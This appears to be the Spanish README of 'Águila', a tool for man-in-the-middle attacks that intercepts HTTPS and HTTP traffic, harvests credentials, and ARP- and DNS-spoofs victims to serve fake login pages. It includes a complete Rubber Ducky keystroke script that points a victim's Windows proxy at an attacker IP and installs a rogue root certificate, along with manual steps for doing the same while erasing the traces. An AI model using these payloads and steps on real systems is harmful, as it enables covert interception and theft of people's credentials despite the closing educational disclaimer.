ÍNDICE
Águila fue programada por M4nu. Aguila es una herramienta diseñada para la vigilancia y manipulación de tráfico de red en tiempo real. Aguila permite interceptar, analizar y alterar la comunicación entre dispositivos en una red. Funciona principalmente en tres modos: Aguila-Https, Aguila-Http y Aguila-Infection.
Aguila-Https: Este modo utiliza un proxy y la herramienta mitmdump para interceptar y analizar tráfico HTTPS. Permite visualizar datos que por lo general están cifrados, como las solicitudes de sitios web y los datos enviados a través de formularios como las credenciales, ademas cuenta con otra herramienta que sin necesidad de configurar el proxy puede interceptar el trafico de dominios visitados por la víctima.
Aguila-Http: Se enfoca en el tráfico HTTP. Captura URLs visitadas y puede detectar posibles credenciales enviadas sin cifrar, como nombres de usuario y contraseñas.
Aguila-Infection: Esta funcionalidad permite el "envenenamiento" de dominios específicos. Esto significa que cuando un dispositivo intenta acceder a un dominio envenenado, Aguila redirige la solicitud a una página controlada por el atacante, permitiendo implantar contenido específico o capturar más datos del usuario engañado.
Iniciar Águila
Antes de iniciar Aguila se recomienda leer el apartado de instalación.
sudo python3 Aguila.py
INSTALACIÓN
Para acceder a Águila, es necesario utilizar la consola de Linux. Para empezar, se debe clonar el repositorio desde GitHub, que puedes encontrar en este enlace: GitHub de Águila.
Una vez dentro del repositorio, procedemos a clonarlo utilizando el comando Git y luego otorgamos los permisos necesarios.
git clone https://github.com/M4nuTCP/Aguila.git
cd Aguila
wget https://downloads.mitmproxy.org/10.3.0/mitmproxy-10.3.0-linux-x86_64.tar.gz
tar -xzvf mitmproxy-10.3.0-linux-x86_64.tar.gz
(solo es necesario mitmdump)
chmod +x Aguila.py AguilaHttps.py mitmdupm
pip install -r requirements.txt
sudo python3 Aguila.pyÁGUILA-HTTPS
Introducción
El apartado de Águila Https incluye dos herramientas: Aguila-Https y Águila-Dominios-Https. Estas facilitan la recolección y análisis de paquetes https, permitiendo capturar tanto credenciales como los dominios que visita la máquina objetivo.
Explicación de las Utilidades:
Aguila-Https: Para utilizar esta función, es necesario configurar el proxy en la máquina objetivo. Más abajo, en la sección de configurar proxy, te mostramos cómo hacerlo, tanto manualmente como automáticamente con un Rubber Ducky. Aguila-Https utiliza mitmdump junto con un filtro que nos permite visualizar los paquetes más relevantes, incluyendo dominios y credenciales.
Aguila-Dominios-Https: Para emplear esta función de Águila, solo necesitas estar en la misma red wifi que la víctima y conocer su dirección IP. La herramienta realiza un arp-scan antes de ejecutar el ataque para que puedas identificar todas las IPs en tu red. Una vez seleccionada la dirección, puedes comenzar a monitorear todos los dominios que visita la víctima.
CONFIGURAR PROXY
Para configurar el certificado falso en la máquina de la víctima, y poder ver las consultas https es necesario hacer una
serie de pasos, para ello primero te daremos un código de una Rubber Ducky para que se hagan todos los pasos en excasos segundos y automaticamente, luego explico como serian los pasos manualmente.
Configuración Automatica:
Para ejecutar este método, necesitarás un Rubber Ducky. Configúralo e inserta el siguiente código:
DELAY 500
GUI d
DELAY 300
GUI
DELAY 300
STRING proxy
DELAY 500
ENTER
DELAY 1000
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
SPACE
DELAY 200
TAB
DELAY 200
STRING 192.168.1.45
DELAY 200
TAB
DELAY 200
STRING 8080
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
ALT F4
DELAY 700
GUI
DELAY 200
STRING edge
DELAY 300
ENTER
DELAY 2000
STRING mitm.it
DELAY 300
ENTER
DELAY 1000
TAB
DELAY 500
ENTER
DELAY 800
TAB
DELAY 400
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 300
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
DOWN
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
DOWN
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 500
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
ALT F4
DELAY 700Este código es ajustables, tomalo como referencia pero no como definitivo.
Configuración Manual:
Tanto en la configuración manual como en la automática, primero ejecutamos Aguila-Https apuntando a la máquina víctima. Luego, en la máquina víctima, realizamos las siguientes modificaciones (las imágenes son de Windows 10, pero el proceso es el mismo para otras versiones):
· Vamos a la configuración de Windows y accedemos a la configuración del proxy
· Después, con Aguila-Https ejecutándose en la máquina atacante, ingresamos a http://mitm.it, hacemos clic en el certificado y se instala automáticamente:
· Al descargar, seleccionamos "Siguiente/Sí" hasta que se nos pregunte dónde queremos guardar el certificado. Debe guardarse en el Almacén de Entidades de Certificación Raíz de Confianza:
· Aunque no es obligatorio, es recomendable eliminar el certificado una vez instalado. Para ello, ve a la carpeta de Descargas, elimina el archivo y vacía la papelera. Lo necesario se ha almacenado previamente donde indicamos, así que no quedará ningún rastro.
ÁGUILA-HTTP
Introducción
El módulo Águila Http permite implementar un demonio en la red que recopila consultas HTTP y credenciales
contenidas en paquetes HTTP. Esta información se acumula para su posterior recuperación al cerrar la sesión,
facilitando la captura de paquetes HTTP sin necesidad de supervisión constante.
Explicación de uso:
Aguila-Http: Esta utilidad es la más sencilla de todas. Al iniciar, solicitará definir la red a escanear
(por ejemplo, 192.168.1.0/24). Se realizará un arp-scan para configurar la dirección IP donde se establecerá el demonio.
Una vez configurado, Águila comenzará a recopilar todos los paquetes, incluyendo los de dominios y credenciales.
ÁGUILA-INFECTION
Introducción
"Águila-Infection" es una técnica para modificar el contenido que la víctima ve en los dominios que visita, permitiendo al atacante insertar cualquier contenido deseado. Esta herramienta se utiliza para obtener credenciales de sitios HTTPS de manera más directa que "Aguila-Https", sin la necesidad de un proxy. Simulando sitios legítimos, permite la captura de credenciales del usuario.
Explicación de Utilidades:
Aguila-arp-spoof: Esta función actúa como intermediario entre el router y la víctima, controlando los paquetes de datos entrantes y salientes. Este método, conocido como "man in the middle", es fundamental para la manipulación de paquetes que serán alterados posteriorment usando "Aguila-dns-spoofer".
Aguila-dns-spoofer: Con el control de paquetes establecido por "Aguila-arp-spoof", "Aguila-dns-spoofer" modifica y redirige estos paquetes a voluntad. Esta herramienta facilita el envenenamiento de DNS al elegir los dominios que se desean afectar.
Explicación de Uso:
Ya sabemos para que sirve Aguila-arp-spoof y Aguila-dns-spoofer es hora de ponerlas en uso, para ello vamos a necesitar
dos terminales, una donde ejecutaremos el Aguila-arp-spoof y otra donde ejecutaremos Aguila-dns-spoofer, pero vamos por
pasos, primero ejecutamos Aguila-arp-spoof y escogemos la victima:
Víctima comprometida, ahora tenemos que cambiar los paquetes DNS, dejamos Aguila-arp-spoof ejecutándose, nos vamos a otra terminal, y ejecutamos Aguila-dns-spoofer, escogemos los dominios que queremos cambiar y ya nos pertenecen esos dominios, pero... ¿Cómo podemos enseñar en el dominio lo que nosotros queramos? Pues simple, una vez que se esté ejecutando Aguila-arp-spoof y Aguila-dns-spoofer cada vez que la víctima visite los dominios envenenados le va a salir un error, pero para que le salga lo que nosotros queremos que se vea, tendremos que irnos a otra terminal y abrir un puerto en python (python3 -m http.server), antes de abrirlo debemos de tener el index.html en el directorio una vez hecho esto cada vez que la víctima abra estos dominios, le saldrá el index.html que nosotros estamos enviando desde nuestro servidor python.
Error:
Si por algun error te quedas sin conexión por una salida mal ejecutada del script, ejecute los siguientes comandos:
sudo iptables -F
sudo iptables -X
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -t mangle -F
sudo iptables -t mangle -X
sudo iptables -P INPUT ACCEPT
sudo iptables -P FORWARD ACCEPT
sudo iptables -P OUTPUT ACCEPTAUTOR
¿Quien soy?
Soy M4nu, actualmente tengo 20 años. Me inicié en el mundo de la ciberseguridad
a través de un Grado Superior en Desarrollo de Aplicaciones Multiplataforma, el cual empecé sin saber que acabaría decantándome por el ámbito
de la ciberseguridad. A través de una asignatura en el segundo año de este grado, comenzó a llamarme la atención y me dediqué a estudiar todos
días esforzándome por obtener certificaciones importantes como la eJPT y la eCPPTv3 hasta el día de hoy..
¿Porque cree Águila?
Script Kiddie es aquel que se siente hacker por tan solo utilizar las herramientas de los demás. Todos lo somos y lo seremos, pero el que de verdad quiere aprender y llegar a un paso más que todos los demás es aquel que crea nuevas herramientas, nuevos 0days, etc. Yo no he descubierto nada; de hecho, todas estas técnicas se llevan utilizando desde hace muchísimo tiempo, pero después de crear Águila, espero haber aportado mi granito de arena a la comunidad y ser un poco menos script kiddie. Esa es la verdadera razón por la que he creado Águila.
⚠️ ATENCIÓN: Esta herramienta ha sido creado exclusivamente con fines educativos, todas las demostraciones son realizadas dentro de entornos controlados que han sido creados para realizar estas pruebas sin afectar a nadie. En ningún momento se fomenta el uso inadecuado de estas técnicas.